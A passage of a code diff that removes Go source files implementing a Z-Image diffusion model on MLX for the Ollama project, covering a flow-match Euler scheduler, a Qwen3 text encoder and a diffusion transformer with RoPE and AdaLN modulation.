func (d *Downsample) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
T := shape[1]
H := shape[2]
W := shape[3]
C := shape[4]
outC := d.Conv.Shape()[0]
// Reshape to [B*T, H, W, C] for 2D conv
x = mlx.Reshape(x, B*T, H, W, C)
// Pad for stride-2 conv: need (3-1)/2 = 1 on each side, but for stride 2 we need specific padding
// For 3x3 stride 2: pad 1 on all sides
x = mlx.Pad(x, []int32{0, 0, 1, 1, 1, 1, 0, 0})
// Conv with stride 2 using manual strided patching
weight := mlx.Transpose(d.Conv, 0, 2, 3, 1)
x = conv2DStrided(x, weight, 2)
if d.Bias != nil {
bias := mlx.Reshape(d.Bias, 1, 1, 1, outC)
x = mlx.Add(x, bias)
}
x = mlx.Reshape(x, B, T, H/2, W/2, outC)
mlx.Eval(x)
return x
}

View File

@@ -1,148 +0,0 @@
//go:build mlx
package zimage
import (
"math"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// FlowMatchSchedulerConfig holds scheduler configuration
type FlowMatchSchedulerConfig struct {
NumTrainTimesteps int32 `json:"num_train_timesteps"` // 1000
Shift float32 `json:"shift"` // 3.0
UseDynamicShifting bool `json:"use_dynamic_shifting"` // false
}
// DefaultFlowMatchSchedulerConfig returns default config
func DefaultFlowMatchSchedulerConfig() *FlowMatchSchedulerConfig {
return &FlowMatchSchedulerConfig{
NumTrainTimesteps: 1000,
Shift: 3.0,
UseDynamicShifting: true, // Z-Image-Turbo uses dynamic shifting
}
}
// FlowMatchEulerScheduler implements the Flow Match Euler discrete scheduler
// This is used in Z-Image-Turbo for fast sampling
type FlowMatchEulerScheduler struct {
Config *FlowMatchSchedulerConfig
Timesteps []float32 // Discretized timesteps
Sigmas []float32 // Noise levels at each timestep
NumSteps int // Number of inference steps
}
// NewFlowMatchEulerScheduler creates a new scheduler
func NewFlowMatchEulerScheduler(cfg *FlowMatchSchedulerConfig) *FlowMatchEulerScheduler {
return &FlowMatchEulerScheduler{
Config: cfg,
}
}
// SetTimesteps sets up the scheduler for the given number of inference steps
func (s *FlowMatchEulerScheduler) SetTimesteps(numSteps int) {
s.SetTimestepsWithMu(numSteps, 0)
}
// SetTimestepsWithMu sets up the scheduler with dynamic mu shift
func (s *FlowMatchEulerScheduler) SetTimestepsWithMu(numSteps int, mu float32) {
s.NumSteps = numSteps
// Create evenly spaced timesteps from 1.0 to 0.0 (flow matching goes t=1 to t=0)
// Match Python: np.linspace(1.0, 0.0, num_inference_steps + 1)
s.Timesteps = make([]float32, numSteps+1)
s.Sigmas = make([]float32, numSteps+1)
for i := 0; i <= numSteps; i++ {
t := 1.0 - float32(i)/float32(numSteps)
// Apply time shift if using dynamic shifting
if s.Config.UseDynamicShifting && mu != 0 {
t = s.timeShift(mu, t)
}
s.Timesteps[i] = t
s.Sigmas[i] = t
}
}
// timeShift applies the dynamic time shift (match Python)
func (s *FlowMatchEulerScheduler) timeShift(mu float32, t float32) float32 {
if t <= 0 {
return 0
}
// exp(mu) / (exp(mu) + (1/t - 1))
expMu := float32(math.Exp(float64(mu)))
return expMu / (expMu + (1.0/t - 1.0))
}
// Step performs one denoising step
// modelOutput: predicted velocity/noise from the model
// timestepIdx: current timestep index
// sample: current noisy sample
// Returns: denoised sample for next step
func (s *FlowMatchEulerScheduler) Step(modelOutput, sample *mlx.Array, timestepIdx int) *mlx.Array {
// Get current and next sigma
sigma := s.Sigmas[timestepIdx]
sigmaNext := s.Sigmas[timestepIdx+1]
// Euler step: x_{t-dt} = x_t + (sigma_next - sigma) * v_t
// where v_t is the velocity predicted by the model
dt := sigmaNext - sigma // This is negative (going from noise to clean)
// x_next = x + dt * velocity
scaledOutput := mlx.MulScalar(modelOutput, dt)
return mlx.Add(sample, scaledOutput)
}
// ScaleSample scales the sample for model input (identity for flow matching)
func (s *FlowMatchEulerScheduler) ScaleSample(sample *mlx.Array, timestepIdx int) *mlx.Array {
// Flow matching doesn't need scaling
return sample
}
// GetTimestep returns the timestep value at the given index
func (s *FlowMatchEulerScheduler) GetTimestep(idx int) float32 {
if idx < len(s.Timesteps) {
return s.Timesteps[idx]
}
return 0.0
}
// GetTimesteps returns all timesteps (implements Scheduler interface)
func (s *FlowMatchEulerScheduler) GetTimesteps() []float32 {
return s.Timesteps
}
// AddNoise adds noise to clean samples for a given timestep
// Used for img2img or inpainting
func (s *FlowMatchEulerScheduler) AddNoise(cleanSample, noise *mlx.Array, timestepIdx int) *mlx.Array {
// In flow matching: x_t = (1-t) * x_0 + t * noise
t := s.Timesteps[timestepIdx]
oneMinusT := 1.0 - t
scaledClean := mlx.MulScalar(cleanSample, oneMinusT)
scaledNoise := mlx.MulScalar(noise, t)
return mlx.Add(scaledClean, scaledNoise)
}
// InitNoise creates initial noise for sampling
func (s *FlowMatchEulerScheduler) InitNoise(shape []int32, seed int64) *mlx.Array {
return RandomNormal(shape, seed)
}
// RandomNormal creates a random normal tensor using MLX
func RandomNormal(shape []int32, seed int64) *mlx.Array {
return mlx.RandomNormal(shape, uint64(seed))
}
// GetLatentShape returns the latent shape for a given image size
func GetLatentShape(batchSize, height, width, latentChannels int32, patchSize int32) []int32 {
// Latent is 8x smaller than image (VAE downscale)
latentH := height / 8
latentW := width / 8
return []int32{batchSize, latentChannels, latentH, latentW}
}

View File

@@ -1,296 +0,0 @@
//go:build mlx
package zimage
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
"github.com/ollama/ollama/x/imagegen/safetensors"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
// Qwen3Config holds Qwen3 text encoder configuration
type Qwen3Config struct {
HiddenSize int32 `json:"hidden_size"`
NumHiddenLayers int32 `json:"num_hidden_layers"`
IntermediateSize int32 `json:"intermediate_size"`
NumAttentionHeads int32 `json:"num_attention_heads"`
NumKeyValueHeads int32 `json:"num_key_value_heads"`
VocabSize int32 `json:"vocab_size"`
RMSNormEps float32 `json:"rms_norm_eps"`
RopeTheta float32 `json:"rope_theta"`
HeadDim int32 `json:"head_dim"`
}
// loadQwen3Config loads text encoder config from a JSON file
func loadQwen3Config(path string) (*Qwen3Config, error) {
data, err := os.ReadFile(path)
if err != nil {
return nil, fmt.Errorf("read config: %w", err)
}
var cfg Qwen3Config
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
return &cfg, nil
}
// Qwen3Attention implements Qwen3 attention with QK norms
type Qwen3Attention struct {
QProj *nn.Linear `weight:"q_proj"`
KProj *nn.Linear `weight:"k_proj"`
VProj *nn.Linear `weight:"v_proj"`
OProj *nn.Linear `weight:"o_proj"`
QNorm *nn.RMSNorm `weight:"q_norm"`
KNorm *nn.RMSNorm `weight:"k_norm"`
// Computed fields
NHeads int32
NKVHeads int32
HeadDim int32
Scale float32
RopeTheta float32
}
// applyRoPEQwen3 applies the custom RoPE for Qwen3 text encoder
func applyRoPEQwen3(x *mlx.Array, seqLen int32, theta float32) *mlx.Array {
shape := x.Shape()
B := shape[0]
L := shape[1]
H := shape[2]
D := shape[3]
half := D / 2
freqsArr := make([]float32, half)
logTheta := float32(math.Log(float64(theta)))
for i := int32(0); i < half; i++ {
freqsArr[i] = float32(math.Exp(float64(-logTheta * float32(i) / float32(half))))
}
freqs := mlx.NewArray(freqsArr, []int32{half})
posArr := make([]float32, seqLen)
for i := int32(0); i < seqLen; i++ {
posArr[i] = float32(i)
}
pos := mlx.NewArray(posArr, []int32{seqLen})
posExpanded := mlx.Reshape(pos, seqLen, 1)
freqsExpanded := mlx.Reshape(freqs, 1, half)
args := mlx.Mul(posExpanded, freqsExpanded)
cosVals := mlx.Cos(args)
sinVals := mlx.Sin(args)
cosVals = mlx.Reshape(cosVals, seqLen, 1, half)
sinVals = mlx.Reshape(sinVals, seqLen, 1, half)
x1 := mlx.Slice(x, []int32{0, 0, 0, 0}, []int32{B, L, H, half})
x2 := mlx.Slice(x, []int32{0, 0, 0, half}, []int32{B, L, H, D})
part1 := mlx.Sub(mlx.Mul(x1, cosVals), mlx.Mul(x2, sinVals))
part2 := mlx.Add(mlx.Mul(x1, sinVals), mlx.Mul(x2, cosVals))
return mlx.Concatenate([]*mlx.Array{part1, part2}, 3)
}
// Forward computes attention with causal masking
func (attn *Qwen3Attention) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
L := shape[1]
q := attn.QProj.Forward(x)
k := attn.KProj.Forward(x)
v := attn.VProj.Forward(x)
q = mlx.Reshape(q, B, L, attn.NHeads, attn.HeadDim)
k = mlx.Reshape(k, B, L, attn.NKVHeads, attn.HeadDim)
v = mlx.Reshape(v, B, L, attn.NKVHeads, attn.HeadDim)
// QK norm uses 1e-6 hardcoded (Qwen3 specific)
q = attn.QNorm.Forward(q, 1e-6)
k = attn.KNorm.Forward(k, 1e-6)
q = applyRoPEQwen3(q, L, attn.RopeTheta)
k = applyRoPEQwen3(k, L, attn.RopeTheta)
q = mlx.Transpose(q, 0, 2, 1, 3)
k = mlx.Transpose(k, 0, 2, 1, 3)
v = mlx.Transpose(v, 0, 2, 1, 3)
if attn.NKVHeads < attn.NHeads {
repeats := attn.NHeads / attn.NKVHeads
k = repeatKV(k, repeats)
v = repeatKV(v, repeats)
}
out := mlx.ScaledDotProductAttention(q, k, v, attn.Scale, true)
out = mlx.Transpose(out, 0, 2, 1, 3)
out = mlx.Reshape(out, B, L, attn.NHeads*attn.HeadDim)
out = attn.OProj.Forward(out)
return out
}
// repeatKV repeats key/value heads for GQA
func repeatKV(x *mlx.Array, repeats int32) *mlx.Array {
if repeats == 1 {
return x
}
shape := x.Shape()
x = mlx.ExpandDims(x, 2)
x = mlx.Tile(x, []int32{1, 1, repeats, 1, 1})
return mlx.Reshape(x, shape[0], shape[1]*repeats, shape[2], shape[3])
}
// Qwen3MLP implements Qwen3 SwiGLU MLP
type Qwen3MLP struct {
GateProj *nn.Linear `weight:"gate_proj"`
UpProj *nn.Linear `weight:"up_proj"`
DownProj *nn.Linear `weight:"down_proj"`
}
// Forward applies the MLP
func (m *Qwen3MLP) Forward(x *mlx.Array) *mlx.Array {
gate := m.GateProj.Forward(x)
gate = mlx.SiLU(gate)
up := m.UpProj.Forward(x)
h := mlx.Mul(gate, up)
return m.DownProj.Forward(h)
}
// Qwen3Block represents a single Qwen3 transformer block
type Qwen3Block struct {
Attention *Qwen3Attention `weight:"self_attn"`
MLP *Qwen3MLP `weight:"mlp"`
InputLayerNorm *nn.RMSNorm `weight:"input_layernorm"`
PostAttnLayerNorm *nn.RMSNorm `weight:"post_attention_layernorm"`
}
// Forward applies the Qwen3 block
func (qb *Qwen3Block) Forward(x *mlx.Array, eps float32) *mlx.Array {
h := qb.InputLayerNorm.Forward(x, eps)
attnOut := qb.Attention.Forward(h)
x = mlx.Add(x, attnOut)
h = qb.PostAttnLayerNorm.Forward(x, eps)
mlpOut := qb.MLP.Forward(h)
x = mlx.Add(x, mlpOut)
return x
}
// Qwen3TextEncoder is the full Qwen3 encoder for Z-Image
type Qwen3TextEncoder struct {
EmbedTokens *nn.Embedding `weight:"model.embed_tokens"`
Layers []*Qwen3Block `weight:"model.layers"`
FinalNorm *nn.RMSNorm `weight:"model.norm"`
*Qwen3Config
}
// Load loads the Qwen3 text encoder from a directory
func (m *Qwen3TextEncoder) Load(path string) error {
fmt.Println("Loading Qwen3 text encoder...")
// Load config
cfg, err := loadQwen3Config(filepath.Join(path, "config.json"))
if err != nil {
return fmt.Errorf("config: %w", err)
}
m.Qwen3Config = cfg
// Pre-allocate layers slice
m.Layers = make([]*Qwen3Block, cfg.NumHiddenLayers)
// Load weights
weights, err := safetensors.LoadModelWeights(path)
if err != nil {
return fmt.Errorf("weights: %w", err)
}
fmt.Print(" Loading weights via struct tags... ")
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return fmt.Errorf("load module: %w", err)
}
fmt.Println("✓")
// Initialize computed fields
m.FinalNorm.Eps = cfg.RMSNormEps
for _, block := range m.Layers {
// Attention
block.Attention.NHeads = cfg.NumAttentionHeads
block.Attention.NKVHeads = cfg.NumKeyValueHeads
block.Attention.HeadDim = cfg.HeadDim
block.Attention.Scale = float32(1.0 / math.Sqrt(float64(cfg.HeadDim)))
block.Attention.RopeTheta = cfg.RopeTheta
block.Attention.QNorm.Eps = cfg.RMSNormEps
block.Attention.KNorm.Eps = cfg.RMSNormEps
// Block norms
block.InputLayerNorm.Eps = cfg.RMSNormEps
block.PostAttnLayerNorm.Eps = cfg.RMSNormEps
}
weights.ReleaseAll()
return nil
}
// Forward encodes text tokens
func (te *Qwen3TextEncoder) Forward(tokens *mlx.Array) *mlx.Array {
h := te.EmbedTokens.Forward(tokens)
eps := te.RMSNormEps
for _, layer := range te.Layers {
h = layer.Forward(h, eps)
}
// Apply final RMS norm
h = te.FinalNorm.Forward(h, eps)
return h
}
// ApplyChatTemplate wraps prompt in Qwen3 chat format
func ApplyChatTemplate(prompt string) string {
return "<|im_start|>user\n" + prompt + "<|im_end|>\n<|im_start|>assistant\n"
}
// EncodePrompt encodes a text prompt using the tokenizer and encoder
func (te *Qwen3TextEncoder) EncodePrompt(tok *tokenizer.Tokenizer, prompt string, maxLen int) (*mlx.Array, *mlx.Array) {
formattedPrompt := ApplyChatTemplate(prompt)
tokens := tok.Encode(formattedPrompt, false)
if len(tokens) > maxLen {
tokens = tokens[:maxLen]
}
maskData := make([]float32, maxLen)
for i := 0; i < len(tokens); i++ {
maskData[i] = 1.0
}
// Get PAD token (different from EOS for Qwen3)
padToken := tok.PAD()
if padToken < 0 {
padToken = tok.EOS() // fallback
}
paddedTokens := make([]int32, maxLen)
copy(paddedTokens, tokens)
for i := len(tokens); i < maxLen; i++ {
paddedTokens[i] = padToken
}
tokensArr := mlx.NewArrayInt32(paddedTokens, []int32{1, int32(maxLen)})
maskArr := mlx.NewArray(maskData, []int32{1, int32(maxLen)})
embeddings := te.Forward(tokensArr)
return embeddings, maskArr
}

View File

@@ -1,692 +0,0 @@
//go:build mlx
// Package zimage implements the Z-Image diffusion transformer model.
package zimage
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// TransformerConfig holds Z-Image transformer configuration
type TransformerConfig struct {
Dim int32 `json:"dim"`
NHeads int32 `json:"n_heads"`
NKVHeads int32 `json:"n_kv_heads"`
NLayers int32 `json:"n_layers"`
NRefinerLayers int32 `json:"n_refiner_layers"`
InChannels int32 `json:"in_channels"`
PatchSize int32 `json:"-"` // Computed from AllPatchSize
CapFeatDim int32 `json:"cap_feat_dim"`
NormEps float32 `json:"norm_eps"`
RopeTheta float32 `json:"rope_theta"`
TScale float32 `json:"t_scale"`
QKNorm bool `json:"qk_norm"`
AxesDims []int32 `json:"axes_dims"`
AxesLens []int32 `json:"axes_lens"`
AllPatchSize []int32 `json:"all_patch_size"` // JSON array, PatchSize = first element
}
// TimestepEmbedder creates sinusoidal timestep embeddings
// Output dimension is 256 (fixed), used for AdaLN modulation
type TimestepEmbedder struct {
Linear1 *nn.Linear `weight:"mlp.0"`
Linear2 *nn.Linear `weight:"mlp.2"`
FreqEmbedSize int32 // 256 (computed)
}
// Forward computes timestep embeddings -> [B, 256]
func (te *TimestepEmbedder) Forward(t *mlx.Array) *mlx.Array {
// t: [B] timesteps
// Create sinusoidal embedding
half := te.FreqEmbedSize / 2
// freqs = exp(-log(10000) * arange(half) / half)
freqs := make([]float32, half)
for i := int32(0); i < half; i++ {
freqs[i] = float32(math.Exp(-math.Log(10000.0) * float64(i) / float64(half)))
}
freqsArr := mlx.NewArray(freqs, []int32{1, half})
// t[:, None] * freqs[None, :] -> [B, half]
tExpanded := mlx.ExpandDims(t, 1) // [B, 1]
args := mlx.Mul(tExpanded, freqsArr)
// embedding = [cos(args), sin(args)] -> [B, 256]
cosArgs := mlx.Cos(args)
sinArgs := mlx.Sin(args)
embedding := mlx.Concatenate([]*mlx.Array{cosArgs, sinArgs}, 1)
// MLP: linear1 -> silu -> linear2
h := te.Linear1.Forward(embedding)
h = mlx.SiLU(h)
h = te.Linear2.Forward(h)
return h
}
// XEmbedder embeds image patches to model dimension
type XEmbedder struct {
Linear *nn.Linear `weight:"2-1"`
}
// Forward embeds patchified image latents
func (xe *XEmbedder) Forward(x *mlx.Array) *mlx.Array {
// x: [B, L, in_channels * 4] -> [B, L, dim]
return xe.Linear.Forward(x)
}
// CapEmbedder projects caption features to model dimension
type CapEmbedder struct {
Norm *nn.RMSNorm `weight:"0"`
Linear *nn.Linear `weight:"1"`
PadToken *mlx.Array // loaded separately at root level
}
// Forward projects caption embeddings: [B, L, cap_feat_dim] -> [B, L, dim]
func (ce *CapEmbedder) Forward(capFeats *mlx.Array) *mlx.Array {
// RMSNorm on last axis (uses 1e-6)
h := ce.Norm.Forward(capFeats, 1e-6)
// Linear projection
return ce.Linear.Forward(h)
}
// FeedForward implements SwiGLU FFN
type FeedForward struct {
W1 *nn.Linear `weight:"w1"` // gate projection
W2 *nn.Linear `weight:"w2"` // down projection
W3 *nn.Linear `weight:"w3"` // up projection
OutDim int32 // computed from W2
}
// Forward applies SwiGLU: silu(W1(x)) * W3(x), then W2
func (ff *FeedForward) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
L := shape[1]
D := shape[2]
// Reshape for matmul
x = mlx.Reshape(x, B*L, D)
gate := ff.W1.Forward(x)
gate = mlx.SiLU(gate)
up := ff.W3.Forward(x)
h := mlx.Mul(gate, up)
out := ff.W2.Forward(h)
return mlx.Reshape(out, B, L, ff.OutDim)
}
// Attention implements multi-head attention with QK norm
type Attention struct {
ToQ *nn.Linear `weight:"to_q"`
ToK *nn.Linear `weight:"to_k"`
ToV *nn.Linear `weight:"to_v"`
ToOut *nn.Linear `weight:"to_out.0"`
NormQ *mlx.Array `weight:"norm_q.weight"` // [head_dim] for per-head RMSNorm
NormK *mlx.Array `weight:"norm_k.weight"`
// Computed fields
NHeads int32
HeadDim int32
Dim int32
Scale float32
}
// Forward computes attention
func (attn *Attention) Forward(x *mlx.Array, cos, sin *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
L := shape[1]
D := shape[2]
// Project Q, K, V
xFlat := mlx.Reshape(x, B*L, D)
q := attn.ToQ.Forward(xFlat)
k := attn.ToK.Forward(xFlat)
v := attn.ToV.Forward(xFlat)
// Reshape to [B, L, nheads, head_dim]
q = mlx.Reshape(q, B, L, attn.NHeads, attn.HeadDim)
k = mlx.Reshape(k, B, L, attn.NHeads, attn.HeadDim)
v = mlx.Reshape(v, B, L, attn.NHeads, attn.HeadDim)
// QK norm
q = mlx.RMSNorm(q, attn.NormQ, 1e-5)
k = mlx.RMSNorm(k, attn.NormK, 1e-5)
// Apply RoPE if provided
if cos != nil && sin != nil {
q = applyRoPE3D(q, cos, sin)
k = applyRoPE3D(k, cos, sin)
}
// Transpose to [B, nheads, L, head_dim]
q = mlx.Transpose(q, 0, 2, 1, 3)
k = mlx.Transpose(k, 0, 2, 1, 3)
v = mlx.Transpose(v, 0, 2, 1, 3)
// SDPA
out := mlx.ScaledDotProductAttention(q, k, v, attn.Scale, false)
// Transpose back and reshape
out = mlx.Transpose(out, 0, 2, 1, 3)
out = mlx.Reshape(out, B*L, attn.Dim)
out = attn.ToOut.Forward(out)
return mlx.Reshape(out, B, L, attn.Dim)
}
// applyRoPE3D applies 3-axis rotary position embeddings
// x: [B, L, nheads, head_dim]
// cos, sin: [B, L, 1, head_dim/2]
func applyRoPE3D(x *mlx.Array, cos, sin *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
L := shape[1]
nheads := shape[2]
headDim := shape[3]
half := headDim / 2
// Create even/odd index arrays
evenIdx := make([]int32, half)
oddIdx := make([]int32, half)
for i := int32(0); i < half; i++ {
evenIdx[i] = i * 2
oddIdx[i] = i*2 + 1
}
evenIndices := mlx.NewArrayInt32(evenIdx, []int32{half})
oddIndices := mlx.NewArrayInt32(oddIdx, []int32{half})
// Extract x1 (even indices) and x2 (odd indices) along last axis
x1 := mlx.Take(x, evenIndices, 3) // [B, L, nheads, half]
x2 := mlx.Take(x, oddIndices, 3) // [B, L, nheads, half]
// Apply rotation: [x1*cos - x2*sin, x1*sin + x2*cos]
r1 := mlx.Sub(mlx.Mul(x1, cos), mlx.Mul(x2, sin))
r2 := mlx.Add(mlx.Mul(x1, sin), mlx.Mul(x2, cos))
// Stack and reshape to interleave: [r1_0, r2_0, r1_1, r2_1, ...]
r1 = mlx.ExpandDims(r1, 4) // [B, L, nheads, half, 1]
r2 = mlx.ExpandDims(r2, 4) // [B, L, nheads, half, 1]
stacked := mlx.Concatenate([]*mlx.Array{r1, r2}, 4) // [B, L, nheads, half, 2]
return mlx.Reshape(stacked, B, L, nheads, headDim)
}
// TransformerBlock is a single transformer block with optional AdaLN modulation
type TransformerBlock struct {
Attention *Attention `weight:"attention"`
FeedForward *FeedForward `weight:"feed_forward"`
AttentionNorm1 *nn.RMSNorm `weight:"attention_norm1"`
AttentionNorm2 *nn.RMSNorm `weight:"attention_norm2"`
FFNNorm1 *nn.RMSNorm `weight:"ffn_norm1"`
FFNNorm2 *nn.RMSNorm `weight:"ffn_norm2"`
AdaLN *nn.Linear `weight:"adaLN_modulation.0,optional"` // only if modulation
// Computed fields
HasModulation bool
Dim int32
}
// Forward applies the transformer block
func (tb *TransformerBlock) Forward(x *mlx.Array, adaln *mlx.Array, cos, sin *mlx.Array, eps float32) *mlx.Array {
if tb.AdaLN != nil && adaln != nil {
// Compute modulation: [B, 256] -> [B, 4*dim]
chunks := tb.AdaLN.Forward(adaln)
// Split into 4 parts: scale_msa, gate_msa, scale_mlp, gate_mlp
chunkShape := chunks.Shape()
chunkDim := chunkShape[1] / 4
scaleMSA := mlx.Slice(chunks, []int32{0, 0}, []int32{chunkShape[0], chunkDim})
gateMSA := mlx.Slice(chunks, []int32{0, chunkDim}, []int32{chunkShape[0], chunkDim * 2})
scaleMLP := mlx.Slice(chunks, []int32{0, chunkDim * 2}, []int32{chunkShape[0], chunkDim * 3})
gateMLP := mlx.Slice(chunks, []int32{0, chunkDim * 3}, []int32{chunkShape[0], chunkDim * 4})
// Expand for broadcasting: [B, 1, dim]
scaleMSA = mlx.ExpandDims(scaleMSA, 1)
gateMSA = mlx.ExpandDims(gateMSA, 1)
scaleMLP = mlx.ExpandDims(scaleMLP, 1)
gateMLP = mlx.ExpandDims(gateMLP, 1)
// Attention with modulation
normX := tb.AttentionNorm1.Forward(x, eps)
normX = mlx.Mul(normX, mlx.AddScalar(scaleMSA, 1.0))
attnOut := tb.Attention.Forward(normX, cos, sin)
attnOut = tb.AttentionNorm2.Forward(attnOut, eps)
x = mlx.Add(x, mlx.Mul(mlx.Tanh(gateMSA), attnOut))
// FFN with modulation
normFFN := tb.FFNNorm1.Forward(x, eps)
normFFN = mlx.Mul(normFFN, mlx.AddScalar(scaleMLP, 1.0))
ffnOut := tb.FeedForward.Forward(normFFN)
ffnOut = tb.FFNNorm2.Forward(ffnOut, eps)
x = mlx.Add(x, mlx.Mul(mlx.Tanh(gateMLP), ffnOut))
} else {
// No modulation (context refiner)
attnOut := tb.Attention.Forward(tb.AttentionNorm1.Forward(x, eps), cos, sin)
x = mlx.Add(x, tb.AttentionNorm2.Forward(attnOut, eps))
ffnOut := tb.FeedForward.Forward(tb.FFNNorm1.Forward(x, eps))
x = mlx.Add(x, tb.FFNNorm2.Forward(ffnOut, eps))
}
return x
}
// FinalLayer outputs the denoised patches
type FinalLayer struct {
AdaLN *nn.Linear `weight:"adaLN_modulation.1"` // [256] -> [dim]
Output *nn.Linear `weight:"linear"` // [dim] -> [out_channels]
OutDim int32 // computed from Output
}
// Forward computes final output
func (fl *FinalLayer) Forward(x *mlx.Array, c *mlx.Array) *mlx.Array {
// c: [B, 256] -> scale: [B, dim]
scale := mlx.SiLU(c)
scale = fl.AdaLN.Forward(scale)
scale = mlx.ExpandDims(scale, 1) // [B, 1, dim]
// LayerNorm (affine=False) then scale
x = layerNormNoAffine(x, 1e-6)
x = mlx.Mul(x, mlx.AddScalar(scale, 1.0))
// Output projection
shape := x.Shape()
B := shape[0]
L := shape[1]
D := shape[2]
x = mlx.Reshape(x, B*L, D)
x = fl.Output.Forward(x)
return mlx.Reshape(x, B, L, fl.OutDim)
}
// layerNormNoAffine applies layer norm without learnable parameters
func layerNormNoAffine(x *mlx.Array, eps float32) *mlx.Array {
ndim := x.Ndim()
lastAxis := ndim - 1
mean := mlx.Mean(x, lastAxis, true)
xCentered := mlx.Sub(x, mean)
variance := mlx.Mean(mlx.Square(xCentered), lastAxis, true)
return mlx.Div(xCentered, mlx.Sqrt(mlx.AddScalar(variance, eps)))
}
// Transformer is the full Z-Image DiT model
type Transformer struct {
TEmbed *TimestepEmbedder `weight:"t_embedder"`
XEmbed *XEmbedder `weight:"all_x_embedder"`
CapEmbed *CapEmbedder `weight:"cap_embedder"`
NoiseRefiners []*TransformerBlock `weight:"noise_refiner"`
ContextRefiners []*TransformerBlock `weight:"context_refiner"`
Layers []*TransformerBlock `weight:"layers"`
FinalLayer *FinalLayer `weight:"all_final_layer.2-1"`
XPadToken *mlx.Array `weight:"x_pad_token"`
CapPadToken *mlx.Array `weight:"cap_pad_token"`
*TransformerConfig
}
// Load loads the Z-Image transformer from a directory
func (m *Transformer) Load(path string) error {
fmt.Println("Loading Z-Image transformer...")
// Load config
cfg, err := loadTransformerConfig(filepath.Join(path, "config.json"))
if err != nil {
return fmt.Errorf("config: %w", err)
}
m.TransformerConfig = cfg
// Pre-allocate slices for loader
m.NoiseRefiners = make([]*TransformerBlock, cfg.NRefinerLayers)
m.ContextRefiners = make([]*TransformerBlock, cfg.NRefinerLayers)
m.Layers = make([]*TransformerBlock, cfg.NLayers)
// Load weights
weights, err := safetensors.LoadModelWeights(path)
if err != nil {
return fmt.Errorf("weights: %w", err)
}
fmt.Print(" Loading weights as bf16... ")
if err := weights.Load(mlx.DtypeBFloat16); err != nil {
return fmt.Errorf("load weights: %w", err)
}
fmt.Printf("✓ (%.1f GB)\n", float64(mlx.MetalGetActiveMemory())/(1024*1024*1024))
fmt.Print(" Loading weights via struct tags... ")
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return fmt.Errorf("load module: %w", err)
}
fmt.Println("✓")
// Initialize computed fields
m.TEmbed.FreqEmbedSize = 256
m.FinalLayer.OutDim = m.FinalLayer.Output.Weight.Shape()[0]
m.CapEmbed.Norm.Eps = 1e-6
for _, block := range m.NoiseRefiners {
initTransformerBlock(block, cfg)
}
for _, block := range m.ContextRefiners {
initTransformerBlock(block, cfg)
}
for _, block := range m.Layers {
initTransformerBlock(block, cfg)
}
weights.ReleaseAll()
return nil
}
// loadTransformerConfig loads transformer config from a JSON file
func loadTransformerConfig(path string) (*TransformerConfig, error) {
data, err := os.ReadFile(path)
if err != nil {
return nil, fmt.Errorf("read config: %w", err)
}
var cfg TransformerConfig
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
// Extract PatchSize from array
if len(cfg.AllPatchSize) > 0 {
cfg.PatchSize = cfg.AllPatchSize[0]
}
return &cfg, nil
}
// initTransformerBlock sets computed fields on a transformer block
func initTransformerBlock(block *TransformerBlock, cfg *TransformerConfig) {
block.Dim = cfg.Dim
block.HasModulation = block.AdaLN != nil
// Init attention computed fields
attn := block.Attention
attn.NHeads = cfg.NHeads
attn.HeadDim = cfg.Dim / cfg.NHeads
attn.Dim = cfg.Dim
attn.Scale = float32(1.0 / math.Sqrt(float64(attn.HeadDim)))
// Init feedforward OutDim
block.FeedForward.OutDim = block.FeedForward.W2.Weight.Shape()[0]
// Set eps on all RMSNorm layers
block.AttentionNorm1.Eps = cfg.NormEps
block.AttentionNorm2.Eps = cfg.NormEps
block.FFNNorm1.Eps = cfg.NormEps
block.FFNNorm2.Eps = cfg.NormEps
}
// RoPECache holds precomputed RoPE values
type RoPECache struct {
ImgCos *mlx.Array
ImgSin *mlx.Array
CapCos *mlx.Array
CapSin *mlx.Array
UnifiedCos *mlx.Array
UnifiedSin *mlx.Array
ImgLen int32
CapLen int32
}
// PrepareRoPECache precomputes RoPE values for the given image and caption lengths.
// hTok and wTok are the number of tokens in each dimension (latentH/patchSize, latentW/patchSize).
func (m *Transformer) PrepareRoPECache(hTok, wTok, capLen int32) *RoPECache {
imgLen := hTok * wTok
// Image positions: grid over (1, H, W) starting at (capLen+1, 0, 0)
imgPos := createCoordinateGrid(1, hTok, wTok, capLen+1, 0, 0)
imgPos = mlx.ToBFloat16(imgPos)
// Caption positions: grid over (capLen, 1, 1) starting at (1, 0, 0)
capPos := createCoordinateGrid(capLen, 1, 1, 1, 0, 0)
capPos = mlx.ToBFloat16(capPos)
// Compute RoPE from UNIFIED positions
unifiedPos := mlx.Concatenate([]*mlx.Array{imgPos, capPos}, 1)
unifiedCos, unifiedSin := prepareRoPE3D(unifiedPos, m.TransformerConfig.AxesDims)
// Slice RoPE for image and caption parts
imgCos := mlx.Slice(unifiedCos, []int32{0, 0, 0, 0}, []int32{1, imgLen, 1, 64})
imgSin := mlx.Slice(unifiedSin, []int32{0, 0, 0, 0}, []int32{1, imgLen, 1, 64})
capCos := mlx.Slice(unifiedCos, []int32{0, imgLen, 0, 0}, []int32{1, imgLen + capLen, 1, 64})
capSin := mlx.Slice(unifiedSin, []int32{0, imgLen, 0, 0}, []int32{1, imgLen + capLen, 1, 64})
return &RoPECache{
ImgCos: imgCos,
ImgSin: imgSin,
CapCos: capCos,
